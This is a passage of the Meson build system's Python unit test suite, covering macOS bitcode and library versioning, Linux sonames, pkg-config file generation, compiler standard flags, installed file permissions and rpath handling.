m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
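        # Example otool -L output (hypothetical paths/versions); the second line
        # is the one parsed by the regex below:
        #   libsome.dylib:
        #       @rpath/libsome.7.dylib (compatibility version 7.0.0, current version 7.0.0)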
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
        # cause installation to fail
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '108 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
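        # What the assertions below amount to, expressed as (illustrative)
        # pkg-config invocations with PKG_CONFIG_LIBDIR pointing at the build's
        # private dir:
        #   pkg-config --modversion libfoo   -> 1.0
        #   pkg-config --libs libfoo         -> ... -lfoo ...
        #   pkg-config --variable=foo libfoo -> bar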
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
        # generated file ourselves.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
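        # The checks below follow the usual ELF aliasing scheme (sketched, not
        # exhaustive): the real library carries the full version in its file
        # name, the SONAME symlink is what the runtime linker resolves, and the
        # plain libfoo.so symlink is what the compile-time linker uses.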
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(glob(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(glob(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(glob(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(glob(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(glob(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
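        # Background for the assertion below: with GCC and Clang the last -O
        # flag on the command line wins, so the -O0 appended for the compiler
        # checks overrides the -O3 supplied via CFLAGS/CXXFLAGS here.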
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
lang_std = p + '_std'
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
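        # _clang_at_least() presumably takes two constraints because Apple's
        # clang uses its own version numbering: the first argument is matched
        # against upstream clang, the second against Xcode/Apple clang.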
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()[lang_std].choices:
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
        # make it error out on unknown -std=... options.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
simpletest_id = Target.construct_id_from_path('subprojects/sublib', 'simpletest', '@exe')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', simpletest_id, 'simpletest-unity0.c'))
sublib_id = Target.construct_id_from_path('subprojects/sublib', 'sublib', '@sha')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', sublib_id, 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
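        # The mode strings below come from stat.filemode(); e.g. 'rw------T'
        # means user read/write only with the sticky bit set but not the execute
        # bit ('T' rather than 't'), and the 's' in 'rwxr-sr-x' is setgid plus
        # group execute.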
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
        install umask of 022, regardless of the umask at the time the worktree
was checked out or the build was executed.
'''
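        # With the default install umask of 022 everything below should end up
        # as 0o755 for directories and executables ('drwxr-xr-x'/'-rwxr-xr-x')
        # and 0o644 for data files ('-rw-r--r--'), regardless of the 002/027
        # umasks used during checkout and build.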
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
        # NOTE: The .pc file has -Lfoo -lfoo -Lbar -lbar, but pkg-config reorders
        # the flags to -Lfoo -Lbar -lfoo -lbar before returning them, whereas
        # pkgconf does not. Sigh. Support both orderings.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
        self.assertEqual(os.path.basename(docbook_target['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(docbook_target['target_sources'][0]['sources'][0]))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_coverage(self):
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found')
if not shutil.which('genhtml') and not gcovr_new_rootdir:
raise unittest.SkipTest('genhtml not found and gcovr is too old')
if 'clang' in os.environ.get('CC', ''):
# We need to use llvm-cov instead of gcovr with clang
raise unittest.SkipTest('Coverage does not work with clang right now, help wanted!')
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
